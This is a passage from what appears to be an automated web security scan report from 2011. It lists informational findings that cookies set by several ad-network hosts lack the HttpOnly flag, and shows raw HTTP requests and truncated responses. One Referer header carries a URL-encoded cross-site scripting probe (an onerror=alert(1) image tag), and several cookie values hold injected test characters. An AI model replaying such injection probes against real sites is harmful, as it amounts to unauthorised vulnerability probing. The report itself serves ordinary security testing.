Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/bzo.454.61DCBAA1/_default;sz=300x250;ord=1316294716649? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 435
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:24:04 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:24:04 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
13.24. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.q.seattlepostintelligencer/be_home;sz=728x90;ord=55136920? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 440
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:29:33 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:29:33 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
13.25. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.q.seattlepostintelligencer/home;sz=300x250;ord=2513202086? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 440
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:29:45 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:29:45 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
13.26. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 439
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:39 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
13.27. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/bzo.454.61DCBAA1/_default;sz=300x250;net=bzo;ord=1316294716649;ord1=205270;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7298
Date: Sat, 17 Sep 2011 16:24:05 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
13.28. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.q.seattlepostintelligencer/be_home;sz=728x90;net=q1;ord=55136920;ord1=477754;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7305
Date: Sat, 17 Sep 2011 16:29:33 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
13.29. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.q.seattlepostintelligencer/home;sz=300x250;net=q1;ord=2513202086;ord1=167008;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7306
Date: Sat, 17 Sep 2011 16:29:45 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
13.30. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7305
Date: Sat, 17 Sep 2011 16:23:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
13.31. http://a.collective-media.net/datapair  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /datapair

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /datapair?net=an&segs=gm&op=add&rnd=1316295499352 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;kw=%20-%20Search%20for%20local%20businesses,%20events,%20and%20coupons%20near%20you;siteref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue;rnd=(1316295499352)
Cookie: cli=121773f9380f32f; dc=sea; nadp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: image/gif
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 42
Date: Sat, 17 Sep 2011 16:55:33 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

GIF89a.............!.......,...........D.;
13.32. http://a.collective-media.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 403 Forbidden
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Sat, 17 Sep 2011 16:27:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 93

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
13.33. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=140&nm_c=200&beacon=2010june&url=[URL_ENCODED_REFERER]&passback HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: u=5f8e79cc-32a7-4701-a3f9-9a6f407e1e04; cdb0=3.113127277138.2266; cdbp=0,19,0; cdb1=; cdb2=; cdb3=; evo5=y9dly9jlztlwn%7Cjt7hNTHSSalmkggJVXyhSde8uI0RYi0avPF9AY0XnbifcaFEMqtkWSNsqllaE9MQ5Qvh0ZHmhqMXkAoIXTUGZU9nxLLIhNudmIQN5of6vB4vDh9TPU%2BkidUnQnV8lGXbiXqzET%2B0owFsOY7lmNgxGEOtTQL1bpTEu6BKOYjD3vTaje3s7aq%2FXcF3VvAicm1lQLkj%2F4xYqajg6Hkhv3ajvfa0hDJicTSwWGgqJ3fkbNkq9P4Mn239%2FQZw1Oa1JeikVeYM4LDw69dHPcDMp640B018JRk419t7Ybt5PBcN%2B25GW5unwqzZ2QVrp2Do7sfbM50SDnIEvNKt%2BPwZ2q03xWEMWAygZ%2FHwhgko6UaL4l%2BDTKIK8G1sxYFjM8jeCaYRUCGPp56861XA%2FW%2FAabxKZO%2BDbQf4VcwQUPcIlH%2B70bVPJbw0lZSaD6n%2BtWQUI%2FiCfdnf2z2Mx6yFnIeqaD2HT7ziMAgr0%2BG9nfxa8YdgSVk9uYu8ZOaM6tn81eFLhaNX

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:04:23 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 15 Sep 2011 17:04:23 GMT
Last-Modified: Thu, 15 Sep 2011 17:04:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_display=%2BVh8H0s8fTT%2FyJTublM%2BiWVvC2%2BXgxUbUPO2JPfLmxQPJcLjX5qzTkpiNBBPst0wI%2BlXbtBUthwow7WNwjS2LQ%3D%3D; expires=Mon, 22-Aug-44591 17:04:23 GMT; path=/; domain=.netmng.com
Content-Length: 768
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Net_Mining_Evolution/B3846296.4;sz=728x90;ord=1316279063?"WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no
...[SNIP]...
13.34. http://a.netmng.com/opt-out.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /opt-out.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /opt-out.php?s=v HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: u=5f8e79cc-32a7-4701-a3f9-9a6f407e1e04; cdb0=3.113127277138.2266; cdbp=0,19,0; cdb1=; cdb2=; cdb3=; evo5=y9dly9jlztlwn%7Cjt7hNTHSSalmkggJVXyhSde8uI0RYi0avPF9AY0XnbifcaFEMqtkWSNsqllaE9MQ5Qvh0ZHmhqMXkAoIXTUGZU9nxLLIhNudmIQN5of6vB4vDh9TPU%2BkidUnQnV8lGXbiXqzET%2B0owFsOY7lmNgxGEOtTQL1bpTEu6BKOYjD3vTaje3s7aq%2FXcF3VvAicm1lQLkj%2F4xYqajg6Hkhv3ajvfa0hDJicTSwWGgqJ3fkbNkq9P4Mn239%2FQZw1Oa1JeikVeYM4LDw69dHPcDMp640B018JRk419t7Ybt5PBcN%2B25GW5unwqzZ2QVrp2Do7sfbM50SDnIEvNKt%2BPwZ2q03xWEMWAygZ%2FHwhgko6UaL4l%2BDTKIK8G1sxYFjM8jeCaYRUCGPp56861XA%2FW%2FAabxKZO%2BDbQf4VcwQUPcIlH%2B70bVPJbw0lZSaD6n%2BtWQUI%2FiCfdnf2z2Mx6yFnIeqaD2HT7ziMAgr0%2BG9nfxa8YdgSVk9uYu8ZOaM6tn81eFLhaNX; evo5_ii=dO%2BC9yz0%2BHoOHUu%2BCgM3YfT1aBj%2BY6%2FIf7Tps%2FoVMpWD5Gr7Ra7NSyGocktMCvFNqs4KrM2Kn1Ptd%2FHmBCVefA%3D%3D; evo5_display=SzT%2BmqB9THXf0Unuooe6Q6WIWFwBue6%2BSNvxxjC2cJM%3D

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:19:26 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Set-Cookie: EVO5_OPT=1; expires=Tue, 14-Sep-2021 17:19:26 GMT; path=/; domain=.netmng.com
Set-Cookie: evo5=deleted; expires=Fri, 17-Sep-2010 17:19:25 GMT; path=/; domain=.netmng.com
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0
Connection: close
Content-Type: text/html

13.35. http://a.raasnet.com/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.raasnet.com
Path:   /a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a?t=nai&type=o&nocache=0.4826675 HTTP/1.1
Host: a.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Thu, 01-Jan-1970 00:00:00 GMT;
Set-Cookie: o=9; path=/; domain=.raasnet.com; expires=Thu, 22-Jan-2037 23:01:43 GMT;
Set-Cookie: ubd=AtEmSNACJQAAA8ZOQvzu; path=/; domain=.raasnet.com; expires=Thu, 01-Jan-1970 00:00:00 GMT;
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 16:48:23 GMT
Connection: close

13.36. http://a.rfihub.com/nai_opt_out_1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /nai_opt_out_1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai_opt_out_1.gif?nocache=0.7176568 HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: n="aACQavnAQ==AE2343AAABMZvbgfg=AE2343AAABMZvbWAw="; u="aABsGGJXg==AIansXMg==AAABMknWu-s="; e=co; a=c625155923287670489; o=1-umA5uIuTMwBQ; r=1312579868684; m="aAaTiaGGg==AI20474526AAABMknWu-s=AI20474526AAABMknV6pQ=AI20474526AAABMka9Efs=AI20474526AAABMka8Dvg=AI20474526AAABMka7tL8=AI20474526AAABMka7SwQ=AI20474526AAABMka3MEU=AI20474526AAABMka2B3E=AI20474526AAABMka0xeg=AI20474526AAABMkazSeo=AI20474526AAABMkaxcTc=AI20474526AAABMkawiH8=AI20474526AAABMkavWJA=AI20474526AAABMkauUw0=AI20474526AAABMkatxl8=AI20474526AAABMkatrbA=AI20474526AAABMkatlC8=AI20474526AAABMkXFqWM=AI20474526AAABMkXEDoM=AI20474526AAABMkWHFgY=AI20474526AAABMkWFI1s=AI20474526AAABMkWCIxU=AI20474526AAABMkWBuwk=AI20474526AAABMkWBq0c=AI20474526AAABMkWBgyM=AI20473955AAABMaqtRJE="; f="aADOmdhlA==AK1315498748AB2AAABMknWu-s=AK1315426108AC23AAABMka9Efo=AK1312828507AB1AAABMaqtRJA="; a1=1CAESEHaajgsfiZKYpJNnQ0UD374; t=1315426113499; s1=1312828513521; a2=2230616255569715877; t1=1315426113481; k="aAD__xtkw==ALnca20474526AN1306280495000AAABMknWu-s=AIneus2343AN1301511032000AAABMkWBgyI=AM-nca20474526AN1306280495000AAABMkWBgyI="

Response

HTTP/1.1 302 Found
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a=cOPT_OUT;Path=/;Domain=.rfihub.com;Expires=Fri, 12-Sep-31 17:20:17 GMT
Set-Cookie: j=cOPT_OUT;Path=/;Domain=.rfihub.com
Cache-Control: no-cache
Location: http://a.rfihub.com/nai_opt_out_2.gif
Content-Length: 0

13.37. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=seattlepicom&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fwww.seattlepi.com%2F&rurl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php&f=0&p=14624935&a=1&rnd=14633219 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 16:23:45 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 489
Expires: 0
Connection: keep-alive

document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?" type="text/javascript"><\/script>\r\n<noscript><a hre
...[SNIP]...
13.38. http://a.tribalfusion.com/z/i.optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

